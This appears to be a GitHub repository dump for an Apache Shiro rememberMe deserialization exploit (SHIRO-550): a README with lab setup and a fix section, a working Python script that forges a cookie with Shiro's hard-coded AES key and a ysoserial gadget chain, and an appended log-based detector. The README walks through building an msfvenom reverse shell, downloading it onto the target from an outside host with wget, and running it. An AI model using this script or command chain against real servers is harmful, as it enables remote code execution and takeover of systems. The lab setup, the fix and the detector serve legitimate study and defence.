├── README.md
├── img
│   ├── .DS_Store
│   ├── 1.png
│   ├── 2.png
│   └── 3.png
├── shiro.war
├── shiro_exploit.py
└── ysoserial.jar

/README.md:
--------------------------------------------------------------------------------
# Apache Shiro Java Deserialization Vulnerability: Analysis and Exploitation
# 0x00 Project address
https://github.com/HexChristmas/Shiro_exploit
# 0x01 Overview
> These past two days I was sent on HW (network defense) and key-asset protection duty. The situational-awareness platform raised an alert for Behinder (冰蝎) remote code execution; from the alert logs, the webshell and related information, the red team had apparently obtained host privileges through Shiro deserialization. A senior colleague had specifically shared the Shiro deserialization vulnerability earlier, and before I had time to study it I ran into it, so this was a good opportunity to research and analyze it.

Shiro uses the rememberMe cookie to recognize a returning user without a fresh login. The `CookieRememberMeManager` class serializes the user's identity with Java object serialization, AES-encrypts the resulting byte stream, base64-encodes it and returns it to the client as the rememberMe cookie; when the cookie comes back on a later request, Shiro reverses those steps and hands the bytes to `ObjectInputStream` for deserialization. The problem is that the AES key is hard-coded in Shiro's source, so the encryption provides no real protection: anyone who knows that key can build a rememberMe cookie whose plaintext is a ysoserial gadget chain (the script in this repository uses `CommonsCollections2`). The server decrypts and deserializes it, the embedded command runs, and that is used here to obtain a reverse shell.
# 0x02 Vulnerable environment
### Method 1: Docker
Pull the ready-made Docker vulnerable environment:
```
docker pull medicean/vulapps:s_shiro_1
```
Map port 8080 of the container to port 80 on the host:
```
docker run -d -p 80:8080 medicean/vulapps:s_shiro_1
```
### Method 2: Tomcat and Shiro on a Linux VM or VPS
The Java environment and the rest are all included.
Download the binary package from the Tomcat site; no need to search for it, here is the link: [Click me to jump there, Run!](http://mirror.bit.edu.cn/apache/tomcat/tomcat-8/v8.5.43/bin/apache-tomcat-8.5.43.tar.gz)
Or you can run directly:
```
sudo wget -P /usr/share http://mirror.bit.edu.cn/apache/tomcat/tomcat-8/v8.5.43/bin/apache-tomcat-8.5.43.tar.gz
```
Then extract it:
```
sudo tar zxvf apache-tomcat-8.5.43.tar.gz
```
```
/usr/share/apache-tomcat-8.5.43/bin/startup.sh
```
Now all that is left is to place the Shiro war under webapps:
```
sudo cp shiro.war /usr/share/apache-tomcat-8.5.43/webapps
```
Then browse to:
```
localhost:8080/Shiro
```
![shiro](https://raw.githubusercontent.com/HexChristmas/Shiro_exploit/master/img/3.png)

If you see this, the application has started successfully.
# 0x02 Exploitation
Generate a reverse-shell payload with msfvenom:
```
msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT=2333 elf > payload
```
![msfvenom](https://raw.githubusercontent.com/HexChristmas/Shiro_exploit/master/img/1.png)

Listen on port 2333 with nc:
```
nc -lvvp 2333
```
Use the Shiro script to exploit the remote code execution vulnerability:
```
python shiro_exploit.py "http://127.0.0.1:81" "wget -p /tmp/ http://172.18.24.35/payload"
```
```
python shiro_exploit.py "http://127.0.0.1:81" "chmod +x /tmp/payload"
```
```
python shiro_exploit.py "http://127.0.0.1:81" "/tmp/payload"
```
![exploit](https://raw.githubusercontent.com/HexChristmas/Shiro_exploit/master/img/2.png)

# 0x03 Fix
Upgrade Shiro to version 1.2.5 or later (from 1.2.5 on, Shiro no longer ships the hard-coded default key and generates a random AES key instead).
# 0x04 References
https://issues.apache.org/jira/browse/SHIRO-550

https://www.seebug.org/vuldb/ssvid-92180
--------------------------------------------------------------------------------
/img/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/StarkChristmas/Shiro_exploit/b13c5577f6f4e55ead54b3e4d778ff12faa59c36/img/.DS_Store
--------------------------------------------------------------------------------
/img/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/StarkChristmas/Shiro_exploit/b13c5577f6f4e55ead54b3e4d778ff12faa59c36/img/1.png
--------------------------------------------------------------------------------
/img/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/StarkChristmas/Shiro_exploit/b13c5577f6f4e55ead54b3e4d778ff12faa59c36/img/2.png
--------------------------------------------------------------------------------
/img/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/StarkChristmas/Shiro_exploit/b13c5577f6f4e55ead54b3e4d778ff12faa59c36/img/3.png
--------------------------------------------------------------------------------
/shiro.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/StarkChristmas/Shiro_exploit/b13c5577f6f4e55ead54b3e4d778ff12faa59c36/shiro.war
--------------------------------------------------------------------------------
/shiro_exploit.py:
--------------------------------------------------------------------------------
```python
# Python 2 script (uses the print statement and "except Exception, e" syntax)
import os
import re
import base64
import uuid
import subprocess
import requests
import sys
from Crypto.Cipher import AES

JAR_FILE = 'ysoserial.jar'

def poc(url,rce_command):
    if '://' not in url:
        target = 'https://%s' % url if ':443' in url else 'http://%s' % url
    else:
        target = url
    try:
        payload = generator(rce_command,JAR_FILE)
        r = requests.get(target,cookies={'rememberMe': payload.decode()},timeout=10)
        print r.text
    except Exception, e:
        pass
    return False

def generator(command, fp):
    if not os.path.exists(fp):
        raise Exception('jar file not found')
    popen = subprocess.Popen(['java','-jar',fp,'CommonsCollections2',command],
                             stdout=subprocess.PIPE)
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key = "kPH+bIxk5D2deZiIxcaaaA=="  # Shiro's hard-coded default key (see SHIRO-550)
    mode = AES.MODE_CBC
    iv = uuid.uuid4().bytes
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext

if __name__ == '__main__':
    url = str(sys.argv[1])
    cmd = str(sys.argv[2])
    poc(url,cmd)
```
--------------------------------------------------------------------------------
/ysoserial.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/StarkChristmas/Shiro_exploit/b13c5577f6f4e55ead54b3e4d778ff12faa59c36/ysoserial.jar
--------------------------------------------------------------------------------
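Added defender-side example, not code from the HexChristmas/Shiro_exploit repository: a log-side check for the rememberMe abuse the README describes. It flags cookie values that cannot be a genuine Shiro cookie (not base64, or not a multiple of the AES block size), values far larger than a serialized identity, and clients that repeatedly receive Shiro's `rememberMe=deleteMe` rejection cookie, which Shiro sets when a rememberMe value fails to decrypt or deserialize. The log format and the size baseline are assumptions; the log lines are constructed.

```python
import base64
import binascii
import re
from collections import Counter

AES_BLOCK = 16
NORMAL_MAX_BYTES = 1024  # assumed baseline: a real identity cookie is a few hundred bytes, a gadget chain several KB
# Constructed sample log (not real traffic): "<client> <method> <path> rememberMe=<cookie> resp:<Set-Cookie or ->"
_LEGIT = base64.b64encode(bytes(144)).decode()  # 16-byte IV + 8 ciphertext blocks: plausible size
_HUGE = base64.b64encode(bytes(4096)).decode()  # far larger than any real identity cookie
_SHORT = base64.b64encode(bytes(20)).decode()   # not a multiple of the AES block size
SAMPLE_LOG = [
    "10.0.0.5 GET /Shiro/ rememberMe=%s resp:-" % _LEGIT,
    "198.51.100.7 GET /Shiro/ rememberMe=%s resp:rememberMe=deleteMe" % _HUGE,
    "198.51.100.7 GET /Shiro/ rememberMe=%s resp:rememberMe=deleteMe" % _HUGE,
    "198.51.100.7 GET /Shiro/ rememberMe=%s resp:rememberMe=deleteMe" % _HUGE,
    "198.51.100.9 GET /Shiro/ rememberMe=abc$% resp:rememberMe=deleteMe",
    "203.0.113.4 GET /Shiro/ rememberMe=%s resp:-" % _SHORT,
]
LOG_RE = re.compile(r"^(?P<ip>\S+) (?P<method>\S+) (?P<path>\S+) "
                    r"rememberMe=(?P<cookie>\S+) resp:(?P<resp>\S+)$")

def classify_cookie(value):
    """Verdict for one rememberMe value: ok, not_base64, bad_block_alignment or oversized."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return "not_base64"
    # Shiro stores iv || ciphertext, so a genuine cookie is at least 2 blocks and block-aligned.
    if len(raw) < 2 * AES_BLOCK or len(raw) % AES_BLOCK:
        return "bad_block_alignment"
    if len(raw) > NORMAL_MAX_BYTES:
        return "oversized"
    return "ok"

def scan_log(lines, delete_me_threshold=3):
    """Return (client, reason) findings: suspicious cookies plus clients repeatedly rejected with deleteMe."""
    findings, rejections = [], Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict = classify_cookie(m.group("cookie"))
        if verdict != "ok":
            findings.append((m.group("ip"), verdict))
        if m.group("resp") == "rememberMe=deleteMe":
            rejections[m.group("ip")] += 1
    for ip, n in rejections.items():
        if n >= delete_me_threshold:
            findings.append((ip, "repeated_deleteMe"))
    return findings
```

Tune `NORMAL_MAX_BYTES` against the cookie sizes your own application actually issues before relying on the size heuristic.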